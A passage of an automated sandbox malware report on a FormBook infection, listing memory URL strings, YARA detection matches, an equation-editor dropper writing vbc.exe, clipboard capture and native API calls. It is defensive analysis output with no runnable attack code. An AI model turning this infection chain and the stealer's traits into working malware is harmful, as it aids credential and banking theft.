Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.mtv.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.myspace.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.najdi.si/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nate.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.neckermann.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.news.com.au/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.nifty.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ocn.ne.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.orange.fr/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.otto.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozon.ru/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ozu.es/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.paginasamarillas.es/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.pchome.com.tw/favicon.ico
Source: explorer.exe, 00000008.00000000.2188989063.000000000842E000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 00000008.00000000.2188989063.000000000842E000.00000004.00000001.sdmp String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.priceminister.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rakuten.co.jp/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rambler.ru/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.recherche.aol.fr/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.rtl.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.servicios.clarin.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.shopzilla.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sify.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.sogou.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.soso.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.t-online.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.taobao.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.target.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tchibo.de/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tesco.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.tiscali.it/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.univision.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.walmart.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmp String found in binary or memory: http://www.windows.com/pctv.
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.ya.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www.yam.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://www3.fnac.com/favicon.ico
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
Source: explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmp String found in binary or memory: http://z.about.com/m/a08.ico
Source: vbc.exe, 00000004.00000002.2171695614.00000000022EA000.00000004.00000001.sdmp String found in binary or memory: https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css

Key, Mouse, Clipboard, Microphone and Screen Capturing:

barindex
Creates a window with clipboard capturing capabilities
Source: C:\Users\Public\vbc.exe Window created: window name: CLIPBRDWNDCLASS Jump to behavior

E-Banking Fraud:

barindex
Yara detected FormBook
Source: Yara match File source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2228656305.0000000000070000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2370792812.0000000000140000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2228957990.0000000000340000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2172461567.0000000003281000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2370752737.0000000000080000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.2229008620.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000009.00000002.2370908208.00000000002B0000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 7.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\so[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76D20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Memory allocated: 76E20000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Memory allocated: 76D20000 page execute and read and write Jump to behavior
Contains functionality to call native functions
Source: C:\Users\Public\vbc.exe Code function: 7_2_004181B0 NtCreateFile, 7_2_004181B0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00418260 NtReadFile, 7_2_00418260
Source: C:\Users\Public\vbc.exe Code function: 7_2_004182E0 NtClose, 7_2_004182E0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00418390 NtAllocateVirtualMemory, 7_2_00418390
Source: C:\Users\Public\vbc.exe Code function: 7_2_00418392 NtAllocateVirtualMemory, 7_2_00418392
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B300C4 NtCreateFile,LdrInitializeThunk, 7_2_00B300C4
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B30078 NtResumeThread,LdrInitializeThunk, 7_2_00B30078
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B30048 NtProtectVirtualMemory,LdrInitializeThunk, 7_2_00B30048
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B307AC NtCreateMutant,LdrInitializeThunk, 7_2_00B307AC
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2F9F0 NtClose,LdrInitializeThunk, 7_2_00B2F9F0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2F900 NtReadFile,LdrInitializeThunk, 7_2_00B2F900
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FAE8 NtQueryInformationProcess,LdrInitializeThunk, 7_2_00B2FAE8
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 7_2_00B2FAD0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FBB8 NtQueryInformationToken,LdrInitializeThunk, 7_2_00B2FBB8
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FB68 NtFreeVirtualMemory,LdrInitializeThunk, 7_2_00B2FB68
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FC90 NtUnmapViewOfSection,LdrInitializeThunk, 7_2_00B2FC90
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FC60 NtMapViewOfSection,LdrInitializeThunk, 7_2_00B2FC60
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FD8C NtDelayExecution,LdrInitializeThunk, 7_2_00B2FD8C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FDC0 NtQuerySystemInformation,LdrInitializeThunk, 7_2_00B2FDC0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FEA0 NtReadVirtualMemory,LdrInitializeThunk, 7_2_00B2FEA0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 7_2_00B2FED0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FFB4 NtCreateSection,LdrInitializeThunk, 7_2_00B2FFB4
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B310D0 NtOpenProcessToken, 7_2_00B310D0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B30060 NtQuerySection, 7_2_00B30060
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B301D4 NtSetValueKey, 7_2_00B301D4
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B3010C NtOpenDirectoryObject, 7_2_00B3010C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B31148 NtOpenThread, 7_2_00B31148
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2F8CC NtWaitForSingleObject, 7_2_00B2F8CC
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B31930 NtSetContextThread, 7_2_00B31930
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2F938 NtWriteFile, 7_2_00B2F938
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FAB8 NtQueryValueKey, 7_2_00B2FAB8
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FA20 NtQueryInformationFile, 7_2_00B2FA20
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FA50 NtEnumerateValueKey, 7_2_00B2FA50
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FBE8 NtQueryVirtualMemory, 7_2_00B2FBE8
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FB50 NtCreateKey, 7_2_00B2FB50
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FC30 NtOpenProcess, 7_2_00B2FC30
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B30C40 NtGetContextThread, 7_2_00B30C40
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FC48 NtSetInformationFile, 7_2_00B2FC48
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B31D80 NtSuspendThread, 7_2_00B31D80
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FD5C NtEnumerateKey, 7_2_00B2FD5C
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FE24 NtWriteVirtualMemory, 7_2_00B2FE24
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FFFC NtCreateProcessEx, 7_2_00B2FFFC
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B2FF34 NtQueueApcThread, 7_2_00B2FF34
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF00C4 NtCreateFile,LdrInitializeThunk, 9_2_01FF00C4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF07AC NtCreateMutant,LdrInitializeThunk, 9_2_01FF07AC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEF9F0 NtClose,LdrInitializeThunk, 9_2_01FEF9F0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEF900 NtReadFile,LdrInitializeThunk, 9_2_01FEF900
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFBB8 NtQueryInformationToken,LdrInitializeThunk, 9_2_01FEFBB8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFB68 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_01FEFB68
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFB50 NtCreateKey,LdrInitializeThunk, 9_2_01FEFB50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFAE8 NtQueryInformationProcess,LdrInitializeThunk, 9_2_01FEFAE8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_01FEFAD0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFAB8 NtQueryValueKey,LdrInitializeThunk, 9_2_01FEFAB8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFDC0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_01FEFDC0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFD8C NtDelayExecution,LdrInitializeThunk, 9_2_01FEFD8C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFC60 NtMapViewOfSection,LdrInitializeThunk, 9_2_01FEFC60
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFFB4 NtCreateSection,LdrInitializeThunk, 9_2_01FEFFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_01FEFED0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF01D4 NtSetValueKey, 9_2_01FF01D4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF1148 NtOpenThread, 9_2_01FF1148
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF010C NtOpenDirectoryObject, 9_2_01FF010C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF10D0 NtOpenProcessToken, 9_2_01FF10D0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF0078 NtResumeThread, 9_2_01FF0078
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF0060 NtQuerySection, 9_2_01FF0060
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF0048 NtProtectVirtualMemory, 9_2_01FF0048
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEF938 NtWriteFile, 9_2_01FEF938
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF1930 NtSetContextThread, 9_2_01FF1930
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEF8CC NtWaitForSingleObject, 9_2_01FEF8CC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFBE8 NtQueryVirtualMemory, 9_2_01FEFBE8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFA50 NtEnumerateValueKey, 9_2_01FEFA50
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFA20 NtQueryInformationFile, 9_2_01FEFA20
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF1D80 NtSuspendThread, 9_2_01FF1D80
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFD5C NtEnumerateKey, 9_2_01FEFD5C
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFC90 NtUnmapViewOfSection, 9_2_01FEFC90
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFC48 NtSetInformationFile, 9_2_01FEFC48
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FF0C40 NtGetContextThread, 9_2_01FF0C40
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFC30 NtOpenProcess, 9_2_01FEFC30
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFFFC NtCreateProcessEx, 9_2_01FEFFFC
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFF34 NtQueueApcThread, 9_2_01FEFF34
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFEA0 NtReadVirtualMemory, 9_2_01FEFEA0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_01FEFE24 NtWriteVirtualMemory, 9_2_01FEFE24
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_000981B0 NtCreateFile, 9_2_000981B0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00098260 NtReadFile, 9_2_00098260
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_000982E0 NtClose, 9_2_000982E0
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00098390 NtAllocateVirtualMemory, 9_2_00098390
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 9_2_00098392 NtAllocateVirtualMemory, 9_2_00098392
Detected potential crypto function
Source: C:\Users\Public\vbc.exe Code function: 4_2_003913BC 4_2_003913BC
Source: C:\Users\Public\vbc.exe Code function: 4_2_0039D8BB 4_2_0039D8BB
Source: C:\Users\Public\vbc.exe Code function: 4_2_0039D2CF 4_2_0039D2CF
Source: C:\Users\Public\vbc.exe Code function: 4_2_00391344 4_2_00391344
Source: C:\Users\Public\vbc.exe Code function: 4_2_0039CBD0 4_2_0039CBD0
Source: C:\Users\Public\vbc.exe Code function: 4_2_00471BF4 4_2_00471BF4
Source: C:\Users\Public\vbc.exe Code function: 4_2_00471C5A 4_2_00471C5A
Source: C:\Users\Public\vbc.exe Code function: 4_2_004719E7 4_2_004719E7
Source: C:\Users\Public\vbc.exe Code function: 4_2_004715BF 4_2_004715BF
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E0448 4_2_007E0448
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E4418 4_2_007E4418
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E65E0 4_2_007E65E0
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E66F8 4_2_007E66F8
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E5755 4_2_007E5755
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E38B0 4_2_007E38B0
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E4CC9 4_2_007E4CC9
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E8DD9 4_2_007E8DD9
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E80E0 4_2_007E80E0
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E80D0 4_2_007E80D0
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E5170 4_2_007E5170
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E83D8 4_2_007E83D8
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E0438 4_2_007E0438
Source: C:\Users\Public\vbc.exe Code function: 4_2_007ED428 4_2_007ED428
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E64FC 4_2_007E64FC
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E7548 4_2_007E7548
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E7538 4_2_007E7538
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E6663 4_2_007E6663
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E66C8 4_2_007E66C8
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E8770 4_2_007E8770
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E8760 4_2_007E8760
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E4701 4_2_007E4701
Source: C:\Users\Public\vbc.exe Code function: 4_2_007ED8C0 4_2_007ED8C0
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E9899 4_2_007E9899
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E89C8 4_2_007E89C8
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E89B8 4_2_007E89B8
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E6A07 4_2_007E6A07
Source: C:\Users\Public\vbc.exe Code function: 4_2_007EDB58 4_2_007EDB58
Source: C:\Users\Public\vbc.exe Code function: 4_2_007E8BF8 4_2_007E8BF8
Source: C:\Users\Public\vbc.exe Code function: 4_2_007EEED0 4_2_007EEED0
Source: C:\Users\Public\vbc.exe Code function: 4_2_007EEFD0 4_2_007EEFD0
Source: C:\Users\Public\vbc.exe Code function: 4_2_0039AC50 4_2_0039AC50
Source: C:\Users\Public\vbc.exe Code function: 4_2_00391170 4_2_00391170
Source: C:\Users\Public\vbc.exe Code function: 4_2_003912B0 4_2_003912B0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00401030 7_2_00401030
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B944 7_2_0041B944
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041BB84 7_2_0041BB84
Source: C:\Users\Public\vbc.exe Code function: 7_2_00408C4B 7_2_00408C4B
Source: C:\Users\Public\vbc.exe Code function: 7_2_00408C50 7_2_00408C50
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041BCF5 7_2_0041BCF5
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041C5ED 7_2_0041C5ED
Source: C:\Users\Public\vbc.exe Code function: 7_2_00402D90 7_2_00402D90
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B70F 7_2_0041B70F
Source: C:\Users\Public\vbc.exe Code function: 7_2_00402FB0 7_2_00402FB0
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B3E0C6 7_2_00B3E0C6
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B6D005 7_2_00B6D005
